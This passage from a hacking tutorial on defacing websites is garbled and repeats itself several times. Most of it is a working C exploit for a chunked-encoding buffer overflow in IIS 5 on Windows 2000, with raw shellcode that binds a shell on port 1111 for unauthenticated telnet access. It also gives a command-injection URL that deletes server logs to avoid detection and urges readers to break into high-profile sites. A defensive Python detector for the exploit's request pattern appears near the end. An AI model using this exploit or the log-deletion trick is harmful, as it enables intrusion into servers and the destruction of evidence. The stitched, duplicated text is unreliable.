        "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01\x89\x47"
        "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89\x47\x3c"
        "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85\x38\xff"
        "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51\x53\xff"
        "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\xff\xff\xff\x89"
        "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\xff\xff\xff\x50"
        "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\xff\xff\xff\x85"
        "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\xff\xff\x50\x53"
        "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0\x74\x6d"
        "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff\xff\xff"
        "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90\x90\x90"
        "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90\x33\xc0"
        "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0\xff\x55\xc8"
        "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50\x8d\x85"
        "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\xff\xff"
        "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4\xff\x75\xc4"
        "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\xff\xff\xff\x6a"
        "\xff\xff\x95\x18\xff\xff\xff";
    char *s1 = "POST ";  /* " HTTP/1.1\r\n" */
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";
    /* 8 KB of 0x90 with the payload at the very end, used as the request-target */
    char shellcodebuff[1024 * 8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;
    char sendbuff[1024 * 16];
    memset(sendbuff, 0, 1024 * 16);
    /* chunked POST; AAAA and BBBB are placeholders patched below (srcdata and
       jmpaddr are passed to sprintf but not consumed by the format string) */
    sprintf(sendbuff, "%s%s%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, srcdata, jmpaddr, sc);
    /* length is taken before the addresses are written in, since they may contain zero bytes */
    int sendlen = strlen(sendbuff);
    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;
    result = send(s, sendbuff, sendlen, 0);
    if (result == -1)
    {
        puts("Send shellcode error");
        return -1;
    }
    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff) - 1, 0);  /* keep the terminator strstr() relies on */
    /* a normal HTML reply means the server handled the request and the overflow did not happen */
    if (strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error, Try again!");
        return -1;
    }
    shutdown(s, 0);
    closesocket(s);
    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again!");
    return 0;
}

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 20: Defacing Website

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89

x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89

x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a

x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3

x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45

xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8

xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a

x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32

xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0

xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0

xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55

xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10

x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff

x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33

xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55

xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50

xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0

xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47

x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c

xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff

xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff

x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89

x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50

x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85

xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53

xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d

x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff

x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90

x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0

x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8

x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85

x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff

xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4

xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a

xffxffx95x18xffxffxff

char s1=POST HTTP11rn

char s2=Accept rn

char s4=Content-Type applicationx-www-

form-urlencodedrn

char s5=Transfer-Encoding

chunkedrnrn

char sc=0rnrnrn

char shellcodebuff[10248]

memset(shellcodebuff0x90sizeof

(shellcodebuff))

memcpy(ampshellcodebuff[sizeof(shellcodebuff)-

strlen(shellcode)-1]shellcodestrlen(shellcode))

shellcodebuff[sizeof(shellcodebuff)-1] = 0

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run Now you

must be wondering what is the use of this code Actually the C

code causes an overflow in IIS on Windows 2000 and commands

the system to bind a shell to the source Ip on port 1111 So once

the exploit works there will be a shell bind on port 1111 on the

target system To workout you must telnet the target IP into port

1111 through this you will be connected to the system without

any kind of authentication

Various Security Measures

Website defacement has become a terrible problem for IT

(Information Technology) based companies Everyday thousands

of websites are defaced Well even Government websites are

defaced for different reasons the most common reason is cyber

war Like in reality there are wars between two rival countries

similarly in wired world there are cyber wars

If you want to see the web attack archive visit the following site

httpdefacedalldasorg

Now some security measures for the system administrators

- First of all you must coordinate and organize your web root

with suitable directories What I mean to say is that you must

organize your files like images in an image directory one for

server side contents and so on so forth If you donrsquot configure your

web root properly then your web server will be prone to many

attacks

- You must be aware of the latest vulnerabilities visit these sites

httpwwwsecurityfocuscom

httpwwwpacketstormorg

httpwwwguininskicom

httpwwwinsecureorg

httpwwwsecuriteamcom

httpwwwslashdotorg

httpwwwtechnotroniccom

Well every web server is vulnerable but you must not fear you

must download the latest patches for the particular vulnerability

Well the last thing is that you must be able to predict the moves

of a malicious cracker or a script kiddie You need to know how a

cracker breaks into your site or web server you need to know the

motive behind the attack and you must think act and work like a

hacker and take the cracker out from the root

So this completes my tutorial on Defacing websites I hope you

have understood the involutions of web servers

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 21: Defacing Website

char sendbuff[102416]

memset(sendbuff0102416)

sprintf(sendbuffsss HTTP11rnsHost

srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile

shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)

int sendlen=strlen(sendbuff)

(DWORD )strstr(sendbuffBBBB) = jmpaddr

(DWORD )strstr(sendbuffAAAA) = srcdata

result=send(ssendbuffsendlen0)

if(result == -1 )

puts(Send shellcode error)

return -1

memset(buff04096)

result=recv(sbuffsizeof(buff)0)

if(strstr(bufflthtmlgt) = NULL)

shutdown(s0)

closesocket(s)

puts(Send shellcode errorTry again)

return -1

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

    char *shellcode = "";   /* placeholder: the original carries its bind-shell payload here as a long hex-escaped string literal, omitted */

    char *s1 = "POST ";
    char *s2 = "Accept: */*\r\n";
    char *s4 = "Content-Type: application/x-www-form-urlencoded\r\n";
    char *s5 = "Transfer-Encoding: chunked\r\n\r\n";
    char *sc = "0\r\n\r\n\r\n";

    char shellcodebuff[1024*8];
    memset(shellcodebuff, 0x90, sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff) - strlen(shellcode) - 1], shellcode, strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff) - 1] = 0;

    char sendbuff[1024*16];
    memset(sendbuff, 0, 1024*16);
    sprintf(sendbuff, "%s%s %s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s",
            s1, destFile, shellcodebuff, s2, destIP, s4, s5, pad, /* srcdata, jmpaddr, */ sc);
    int sendlen = strlen(sendbuff);

    *(DWORD *)strstr(sendbuff, "BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff, "AAAA") = srcdata;

    result = send(s, sendbuff, sendlen, 0);
    if(result == -1)
    {
        puts("Send shellcode error");
        return -1;
    }

    memset(buff, 0, 4096);
    result = recv(s, buff, sizeof(buff), 0);
    if(strstr(buff, "<html>") != NULL)
    {
        shutdown(s, 0);
        closesocket(s);
        puts("Send shellcode error. Try again");
        return -1;
    }

    shutdown(s, 0);
    closesocket(s);

    printf("\nUse <telnet %s 1111> to connect to the host\n", destIP);
    puts("If you cannot connect to the host, try run this program again");
    return 0;
}

IMPLEMENTATION OF THE CODE

To implement the C code you must compile it and run it. Now you must be wondering what the use of this code is. Actually, the C code causes an overflow in IIS on Windows 2000 and commands the system to bind a shell to the source IP on port 1111. So once the exploit works, there will be a shell bound on port 1111 on the target system. To work it out, you must telnet to the target IP on port 1111; through this you will be connected to the system without any kind of authentication.
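The request the code above assembles in its sprintf() call has a recognisable shape: a request target followed by kilobytes of 0x90 padding and raw bytes before "HTTP/1.1", a Transfer-Encoding: chunked header, and chunks carrying filler and raw addresses. As an added example (not part of the tutorial or the CHINANSL code), here is a Python check a defender could run over captured requests to flag that shape; the two sample requests are constructed here and the request-line size threshold is an assumption.

```python
"""Flag HTTP requests shaped like the chunked-encoding exploit request above.

Added example, not from the original tutorial. Sample requests are constructed
inline and contain only filler bytes, no payload.
"""

MAX_REQUEST_LINE = 2048                 # assumption: a sane request line is far shorter
PRINTABLE = set(range(0x20, 0x7f))      # printable ASCII byte values


def split_request(raw: bytes):
    """Split a raw HTTP request into (request_line, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def chunk_payloads(body: bytes):
    """Yield the data of each chunk in a chunked body; stop at the 0 chunk or on malformed input."""
    pos = 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            return
        size_field = body[pos:end].split(b";")[0].strip()
        try:
            size = int(size_field, 16)
        except ValueError:
            return
        if size == 0:
            return
        yield body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2          # skip chunk data and its trailing CRLF


def analyze_request(raw: bytes) -> list:
    """Return a list of findings; an empty list means the request looks ordinary."""
    findings = []
    request_line, headers, body = split_request(raw)
    parts = request_line.split(b" ")
    # The exploit's request line is "POST <asp path> <8 KB padding+code> HTTP/1.1",
    # so it is oversized, has four fields instead of three, and is mostly binary.
    if len(request_line) > MAX_REQUEST_LINE:
        findings.append("oversized request line (%d bytes)" % len(request_line))
    if len(parts) != 3:
        findings.append("request line has %d space-separated fields, expected 3" % len(parts))
    nonprint = sum(1 for b in request_line if b not in PRINTABLE)
    if nonprint:
        findings.append("%d non-printable bytes in request line" % nonprint)
    if b"\x90" * 64 in request_line:
        findings.append("NOP sled (run of 0x90) in request line")
    # The exploit's chunks carry 0xCC filler and raw addresses rather than form data.
    if b"chunked" in headers.get(b"transfer-encoding", b"").lower():
        for data in chunk_payloads(body):
            if any(b not in PRINTABLE for b in data):
                findings.append("binary bytes inside chunked body")
                break
    return findings


# Constructed sample: an ordinary chunked POST to the same ASP page.
BENIGN_REQUEST = (
    b"POST /iisstart.asp HTTP/1.1\r\n"
    b"Host: 127.0.0.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"5\r\nhello\r\n0\r\n\r\n"
)

# Constructed sample mirroring the exploit's layout: NOP padding in the request
# line, the 16-byte pad chunk, and two 4-byte chunks of placeholder bytes where
# the exploit writes addresses. No executable payload is included.
SUSPICIOUS_REQUEST = (
    b"POST /iisstart.asp " + b"\x90" * 8192 + b"XXXX" + b" HTTP/1.1\r\n"
    + b"Accept: */*\r\nHost: 127.0.0.1\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Transfer-Encoding: chunked\r\n\r\n"
    + b"10\r\n" + b"\xcc" * 4 + b"ADPA" + b"\x02" * 4 + b"PADP" + b"\r\n"
    + b"4\r\n\x01\x02\x03\x04\r\n" + b"4\r\n\x05\x06\x07\x08\r\n" + b"0\r\n\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST)):
        print(label, analyze_request(req))
```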

Various Security Measures

Website defacement has become a terrible problem for IT (Information Technology) based companies. Every day thousands of websites are defaced. Well, even government websites are defaced for different reasons; the most common reason is cyber war. Just as in reality there are wars between two rival countries, similarly in the wired world there are cyber wars.

If you want to see the web attack archive, visit the following site: http://defaced.alldas.org

Now some security measures for the system administrators:

- First of all, you must coordinate and organize your web root with suitable directories. What I mean to say is that you must organize your files, like images in an image directory, one directory for server-side contents, and so on and so forth. If you don't configure your web root properly, then your web server will be prone to many attacks.

- You must be aware of the latest vulnerabilities; visit these sites:

http://www.securityfocus.com
http://www.packetstorm.org
http://www.guininski.com
http://www.insecure.org
http://www.securiteam.com
http://www.slashdot.org
http://www.technotronic.com

Well, every web server is vulnerable, but you must not fear; you must download the latest patches for the particular vulnerability.

Well, the last thing is that you must be able to predict the moves of a malicious cracker or a script kiddie. You need to know how a cracker breaks into your site or web server, you need to know the motive behind the attack, and you must think, act and work like a hacker and take the cracker out from the root.

So this completes my tutorial on Defacing Websites. I hope you have understood the involutions of web servers.

Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM

Page 22: Defacing Website

shutdown(s0)

closesocket(s)

printf(nUse lttelnet s 1111gt to connect to the hostndestIP)

puts(If you cannot connect to the hosttry run this program again)

return 0

The above code is called as an exploit code these are written in

powerful programming languages like C Perl or sometimes JAVA

Exploit Codes are written according to the vulnerability

Vulnerabilities were discovered in the past nowadays it has been

seen that server softwares and operating systems are patched for

these vulnerabilities So you canrsquot just execute exploit code to

break into a server you must overwork an exploit code so that it

works according to your needs One more thing I must mention is

that you must keep yourself updated with latest vulnerabilities by

visiting the sites that I have mentioned earlier in the tutorial

Well I think its better that you code your own exploit code in Perl

or C in order to break into websites

NOTE I am talking about high profile websites I am not talking

about lame websites coded in notepad

Keeping yourself safe

Well you must be familiar with server softwares like Apache

Microsoft IIS etc So you must be knowing about the log files

which records each and every request made by the server As it

records everything system administrators will have no problem

catching the malicious cracker or script kiddie as the log file will

have the IP (Internet Protocol) address and through the IP

address you can trace the cracker or the script kiddie

NOTE Read my tutorial on Gathering Information of Remote Host

TIP If you do not want to get busted you must clear the log files

after you break into a web server

CLEARING LOGS

You must clear yoursquore the logs in order to save yourself from

getting busted So you can use cross site scripting vulnerability

to clear the log files You can do by executing the following URL

httpwwwtargetcomcgi-bintest-cgibat|DEL+log

NOTE The above URL can be used in Apache server software

In case of IIS on Windows 2000 you can use the following method

to get a DOS Shell through telnet

The Following code exploits a buffer overflow in IIS 5 on Windows

2000 server and opens port 1111 and binds a shell to it If the

exploit is successful then all you have to do is use telnet to

connect to port 1111 of target and the system is yours

Windows 2000 Server Exploit By CHINANSL Security Team

Test on Windows 2000 Chinese Version IIS 50 not patched

WarningTHIS PROGRAM WILL ONLY TEST

CHINANSL Technology COLTD httpwwwchinanslcom

kejichinanslcom

include stdafxh

include ltstdiohgt

include ltstdlibhgt

include ltstringhgt

include ltwindowshgt

pragma comment (libWs2_32)

int main(int argc char argv[])

if(argc = 4)

printf(s ip port aspfilepathnnargv[0])

printf( ie s 127001 80 iisstartaspnargv[0])

puts( programed by kejichinanslcom)

return 0

DWORD srcdata=0x01e2fb1c-40x00457474

address of SHELLCODE

DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec

x1cxfbxe6x01 x0cxfbxe6x01

char destIP=argv[1]

char destFile=argv[3]

int webport=atoi(argv[2])

char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes

WSADATA ws

SOCKET s

long result=0

if(WSAStartup(0x0101ampws) = 0)

puts(WSAStartup() error)

return -1

struct sockaddr_in addr

addrsin_family=AF_INET

addrsin_port=htons(webport)

addrsin_addrs_addr=inet_addr(destIP)

s=socket(AF_INETSOCK_STREAM0)

if(s==-1)

puts(Socket create error)

return -1

if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)

puts(Cannot connect to the specified host)

return -1

char buff[4096]

char

shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8

9

x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32

xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab

x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f

xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89

x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0

x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89

x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe

x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56

xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc

xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89

